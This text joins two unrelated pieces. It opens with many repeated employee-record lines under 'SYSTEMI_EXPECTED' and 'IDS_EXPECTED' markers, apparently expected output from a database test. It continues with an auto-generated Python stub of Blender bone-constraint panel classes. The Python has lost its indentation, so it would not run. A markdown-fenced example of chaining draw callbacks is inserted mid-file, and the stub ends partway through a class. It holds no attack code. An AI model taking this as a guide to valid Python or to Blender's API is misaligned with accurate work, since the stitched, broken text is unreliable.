#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__SYSTEMI_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__IDS_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80

import sys
import typing
import bpy_types
class BoneConstraintPanel:
bl_context = None
''' '''
def poll(self, context):
'''
'''
pass
class ConstraintButtonsPanel:
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
class ConstraintButtonsSubPanel:
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
class ObjectConstraintPanel:
bl_context = None
''' '''
def poll(self, context):
'''
'''
pass
class BONE_PT_constraints(BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bArmatureConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bCameraSolverConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bChildOfConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bClampToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
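# The append/prepend/remove methods above come from bpy_types._GenericUI and
# let add-ons chain extra draw functions onto a registered panel. A minimal
# stand-in sketch of that mechanism (FakePanel and extra_ui are illustrative
# substitutes, not the real bpy API):

```python
class FakePanel:
    # Hypothetical stand-in for a bpy.types.Panel subclass; _GenericUI keeps
    # a list of draw callbacks and invokes them in order during draw().
    _draw_funcs = []

    @classmethod
    def append(cls, draw_func):
        # Run draw_func after the panel's own layout code.
        cls._draw_funcs.append(draw_func)

    @classmethod
    def prepend(cls, draw_func):
        # Run draw_func before the panel's own layout code.
        cls._draw_funcs.insert(0, draw_func)

    @classmethod
    def remove(cls, draw_func):
        # Unregister a previously appended/prepended callback.
        cls._draw_funcs.remove(draw_func)

    @classmethod
    def draw(cls, context):
        # Call each registered callback with the current context.
        return [func(context) for func in cls._draw_funcs]


def extra_ui(context):
    # Illustrative extension callback; real code would add layout rows here.
    return f"extra:{context}"


FakePanel.append(extra_ui)
```

# In Blender itself the same pattern is e.g.
# BONE_PT_bClampToConstraint.append(my_draw_func) from an add-on's register().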
class BONE_PT_bDampTrackConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
